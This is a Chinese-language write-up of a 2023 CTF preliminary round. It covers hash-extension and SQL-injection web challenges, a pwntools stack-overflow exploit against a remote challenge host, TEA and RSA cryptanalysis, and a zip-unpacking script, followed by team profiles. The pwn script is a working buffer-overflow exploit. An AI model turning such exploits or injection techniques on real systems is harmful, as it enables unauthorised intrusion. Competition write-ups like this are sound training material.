2023年国家基地“楚慧杯”网络安全实践能力竞赛初赛WriteUp

WriteUp 4个月前 admin

165 0 0

本文来自：天权信安网络安全生态圈

作者：天权信安网络安全团队

2023年国家基地“楚慧杯”网络安全实践能力竞赛初赛WriteUp

恭喜

天权信安网络安全团队

在2023年国家基地“楚慧杯”网络安全实践能力竞赛国内相关技术爱好者组别中荣获第三名

2023年国家基地“楚慧杯”网络安全实践能力竞赛初赛WriteUp

下面将由本团队分享比赛部分解题过程：

WEB

upload_shell

直接用hash_ext_attack.py。

哈希扩展攻击，若等于，直接伪造密码为password123进入。

然后发现文件名出存在SQL注入。

成功和不成功回显不一样，可以使用盲注，直接用sqlmap一把梭。

Eaaeval

命令执行，发现www.zip压缩文件，发现源码，直接反序列化打。

Exp:

PWN

ez_base

程序代码看不懂

Shift+f12能看到flag.txt字符串

跟进去，找到用这个字符串的函数

猜测为后门函数地址，

然后运行程序，找溢出点

因此肯定存在栈溢出，垃圾数据的个数一个一个试，最后发现是0x28，填上返回地址

不知道为啥0x40490d不行，这里用的0x404911

脚本如下：

from pwn import *from struct import packfrom ctypes import *from LibcSearcher import *import base64import gmpy2li = lambda x : print('x1b[01;38;5;214m' + x + 'x1b[0m')ll = lambda x : print('x1b[01;38;5;1m' + x + 'x1b[0m')def s(a):    p.send(a)def sa(a, b):    p.sendafter(a, b)def sl(a):    p.sendline(a)def sla(a, b):    p.sendlineafter(a, b)def r():    p.recv()def pr():    print(p.recv())def rl(a):    return p.recvuntil(a)def inter():    p.interactive()def bug():    gdb.attach(p)    pause()def get_addr():    return u64(p.recvuntil(b'x7f')[-6:].ljust(8, b'x00'))def get_sb():    return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/shx00'))
context(os='linux', arch='amd64', log_level='debug')#p = process('./base')p = remote('tcp.cloud.dasctf.com', 29421)#elf = ELF('./base')libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")#libc = ELF('./libc-2.31.so')
rl("2:decode")sl(str(1))rl("cin de_str:")pay=b'a'*(0x28)+p64(0x404911)#bug()sl(pay)
  inter()

REVERSE

Babyre

很明显的TEA

直接套网上脚本再改一下：

#include <stdio.h>#include <stdint.h> void decipher(unsigned int num_rounds, uint32_t v[2], uint32_t const key[4]) {    unsigned int i;    uint32_t v0=v[0], v1=v[1], delta=0x9E3779B9, sum=delta*num_rounds;    for (i=0; i < num_rounds; i++) {         v1 -= ~(key[ (sum >> 11) & ((sum >> 11) ^ 0xFFFFFFFC)] + sum) & (v0 + (~(v0 >> 5) & (16 * v0) | ~(16 * v0) & (v0 >> 5))) | ~(v0                                                                                         + (~(v0 >> 5) & (16 * v0) | ~(16 * v0) & (v0 >> 5))) & (key[ (sum >> 11) & ((sum >> 11) ^ 0xFFFFFFFC)] + sum);    sum -= delta;  v0 -= ~(key[~(~sum | 0xFFFFFFFC)] + sum) & (v1 + (~(v1 >> 5) & (16 * v1) | ~(16 * v1) & (v1 >> 5))) | ~(v1 + (~(v1 >> 5) & (16 * v1) | ~(16 * v1) & (v1 >> 5))) & (key[~(~sum | 0xFFFFFFFC)] + sum);    }    v[0]=v0; v[1]=v1;}

int main(){    uint32_t v[2]={ 2673635823L, 1004846423};    uint32_t const k[4]={0xDEADBEEF ,0x87654321,0xFACEB00C ,0xCAFEBABE};    unsigned int r=32;      decipher(r, v, k);    printf("解密后的数据：%u %un",v[0],v[1]);}

运行后得到flag

MISC

ez_zip

压缩包套娃解压，脚本如下

import osimport zipfileimport shutil
def find_latest_zip(directory):    zip_files = [f for f in os.listdir(directory) if f.endswith('.zip')]
    if not zip_files:        return None
    latest_zip = max(zip_files, key=os.path.getctime)    return os.path.join(directory, latest_zip)
def unzip_and_move(zip_file, extract_to, move_to):    try:        with zipfile.ZipFile(zip_file, 'r') as zip_ref:            zip_ref.extractall(extract_to)                files = os.listdir(extract_to)        for file in files:            source_path = os.path.join(extract_to, file)            destination_path = os.path.join(move_to, file)            shutil.move(source_path, destination_path)            print(f"移动文件 {file} 到根目录")
        return True    except zipfile.BadZipFile:        print("无法解压 ZIP 文件！")        return False    except Exception as e:        print(f"发生错误：{e}")        return False
def main():    root_directory = os.getcwd()
    extracted_directory = 'D:/比赛/楚慧杯/MISC/ez_zip的附件/tempdir/MISC附件/题目附件/'
    zip_directory = 'D:/比赛/楚慧杯/MISC/ez_zip的附件/tempdir/MISC附件/题目附件/'
    while True:        latest_zip = find_latest_zip(zip_directory)
        if latest_zip:            success = unzip_and_move(latest_zip, extracted_directory, root_directory)
            if success:                os.remove(latest_zip)        else:            print("没有找到更多的 ZIP 文件")            break
if __name__ == "__main__":    main()

解压之后得到1.txt

将+改成，-改成0

>>> x='''01000100 01000001 01010011 01000011 01010100 01000110 01111011 00110001 00110000 01100011 00110101 00111000 00110010 00110101 00111000 01100011 01100011 01100110 00110001 01100101 00110111 01100011 00110110 00110011 00110001 01100101 00110101 00111001 00110001 00110001 01100101 01100100 00110110 01100001 01100011 01100011 00110100 01100101 01100100 01111101'''>>> s=x.split(' ')>>> ''.join(chr(int(c,2)) for c in s)'DASCTF{10c58258ccf1e7c631e5911ed6acc4ed}'

得到flag

CRYPTO

so-large-e

http://www.hiencode.com/pub_asys.html

公钥解析得到n和e

https://github.com/Gao-Chuan/RSA-and-LLL-attacks/blob/master/boneh_durfee.sage

然后利用RSA-and-LLL-attacks解出d

d=663822343397699728953336968317794118491145998032244266550694156830036498673227937

n=0xA5ED986D5C338815D4A79DE8ED3A7D9639D72ACB3AEF28C5454C8A92C8F5774E48F99BD11373FAE5BCB24B710BC8D15EADAFEBB94EAFB3A96050CECBD1B2F2ADF9AA74256F2EA74A83D67188BDC25576C5808DDB1EEC01FF377FB183C36B1F79CED0E216CCCA64187FB84D5B0E06EF0C9E19D1F52C53903A7E814B47B4F47F6B
e = 0x00a18e9d8f15fa4257886b5723c9aca3f68076d6fa8ee604d89477702f51c6e4afbac0e928f7b54df7c86288a176e6642e2b58d72eaabb2808fbc8165fd81d83ca5433a5d8f94b683562fd0e44ca61a451f3d7a19b12731be466d90eb7d5d8e3058478332dc45fecc275749e10144891076a614bde2d0f0167fdb8175d561787e1 d = 663822343397699728953336968317794118491145998032244266550694156830036498673227937 c = 6838759631922176040297411386959306230064807618456930982742841698524622016849807235726065272136043603027166249075560058232683230155346614429566511309977857815138004298815137913729662337535371277019856193898546849896085411001528569293727010020290576888205244471943227253000727727343731590226737192613447347860
In [2]: x=pow(c,d,n)
In [3]: from libnum import *
In [4]: n2s(x)Out[4]: 'DASCTF{6f4fadce-5378-d17f-3c2d-2e064db4af19}'

— 结束 —

–天权信安网络安全团队–

网络无边安全有界

2022，感恩有您

2023，携手同行

用技术撬动未来，用奋斗描绘成功！

天权信安网络安全团队（简称“天权信安”），成立于2022年，是一支研究红蓝对抗、内网渗透、红队武器库、CTF竞赛及其网安相关活动的安全团队。这里聚集着一群有技术有担当有理想、热爱信安奉献信安的多方面专业人才。天权信安的“天权”来源于北斗七星，又称为文曲星，它代表着天资聪颖，能力超群，也象征着天权信安的高标准、高水平与高质量，体现着我们的宗旨–打造一支作风优良、实力强劲、团结协作的精英团队，用技术与毅力共同守护网络安全。目前成员 40 余人，成员也来自于国内重点研究实验室，队员分布于阿尔托大学（国外）、科大、航空大、武大、华科、电子科大、西电、警大、江苏海洋大学、国际关系学院、广大、河北师大、吉林师大、西南石油、安工院、湖工大、华师大、湘大、湖南工程学院等国内各大高校，也分布于绿盟科技、奇安信、长亭科技、安恒信息、联通、移动等国内大厂。为“网络安全爱好者”提供一个更好的学习交流生态圈，天权信安欢迎技术大咖、攻防渗透、CTF选手等资深专业人士前来分享网络安全前沿技术、攻防实战经验、内网渗透、IOT安全、电子取证、CTF、APT、工控安全等技术，通过经验分享，来帮助大家了解最新网络安全动态，提升安全技术水平，拓宽知识领域，致力于打造一个开放共享的网络安全生态圈。

2023年国家基地“楚慧杯”网络安全实践能力竞赛初赛WriteUp

–最新动态–

网络无边安全有界

2022，感恩有您

2023，携手同行

AGCTF战队介绍

安阳工学院信息安全实验室AGCTF战队成立于2016年隶属于计算机科学与信息工程学院，也是由凌泽网安与安工院共建的校内安全团队，信息安全学生团队依托信息安全实验室，以研究信息安全为主，用CTF竞赛来证明自己的实力，日常学习过程中注重实验员未来的发展鼓励实验员参加国家组织的各式安全活动。信息安全学生团队现有成员19名，CTF队伍四队(三人一队)大二学生九人、大三学生三人。团队在最近的国家级赛事中排名均在五十名左右，2019获得省级以上奖励三次，2020年获得省级以上奖励四次。实验室现有证书23张，其中国家级证书7张省级证书16张。2020年我校安全团队三名大二的成员受邀请参与某单位护网行动，均得到邀请方的赞扬及工作认可。

2023年国家基地“楚慧杯”网络安全实践能力竞赛初赛WriteUp

第20届全国大学生信息安全与对抗技术竞赛国赛决赛一等奖 2023年国家基地“楚慧杯”网络安全实践能力竞赛初赛WriteUp

Ns1A战队介绍

Ns1A是由湘潭大学计算机学院·网络空间安全学院一群爱好网络安全的小伙伴组成的ctf战队。Ns1A来源于Net Security Laboratory，战队成员专注于研究网络安全技术、参加各种CTF竞赛，旨在通过实践和比赛来提高成员网络安全的技能和经验，培养实力强劲、有作为、有担当的网络空间安全技术人才。指导老师：院党委委委员刘新老师、院团委书记文磊老师等。

2023年国家基地“楚慧杯”网络安全实践能力竞赛初赛WriteUp

国际关系学院网络空间安全学院介绍

国际关系学院网络空间安全学院中有一群热爱网络安全的小伙伴，志在对国家网络安全做出力有所及的贡献。目前研究的领域包括ctf传统5个方向，云安全，安卓逆向，区块链，机器学习等多个领域。

2023年国家基地“楚慧杯”网络安全实践能力竞赛初赛WriteUp

木鱼安全团队介绍

木鱼安全团队成立于2022年是一支由湖南工程学院网络空间安全实验室建立的安全团队。团队致力于钻研网络安全技术，专注于CTF竞赛，渗透测试，漏洞挖掘，红蓝对抗等方向。团队旗下分有渗透小组和CTF小组，现成员共有十余名，在红明谷杯，DASCTF，以及省赛国赛中取得优异成绩，在各大SRC漏洞平台都有提交漏洞报告，获得过上海交通大学，同济大学，太原理工大学等漏洞报送证书，以及CNVD证书等，并且在各市级、省级以及国家级攻防演练中表现出色，获得各单位的证书和感谢信。指导老师有韩宁、张晓清等。

2023年国家基地“楚慧杯”网络安全实践能力竞赛初赛WriteUp

SourceCode战队

SourceCode战队成立于2017年，是河北师范大学唯一的本科生校级网络安全团队。战队隶属于河北省网络与信息安全重点实验室，由王方伟教授，王长广教授指导，专注于CTF竞赛、渗透测试、逆向分析等方向。战队通过一系列的比赛实战来完善自己的知识体系，维护网络安全，力争做优秀的白帽子。曾获得2021第三届信息安全铁人三项全国亚军以及70000奖金、2022一带一路暨金砖国家企业信息系统安全金砖赛二等奖和三等奖、2022第十五届全国大学生信息安全竞赛创新实践能力赛分区赛二等奖、2023全国大学生信息安全竞赛创新实践能力赛华北赛区一等奖。

2023年国家基地“楚慧杯”网络安全实践能力竞赛初赛WriteUp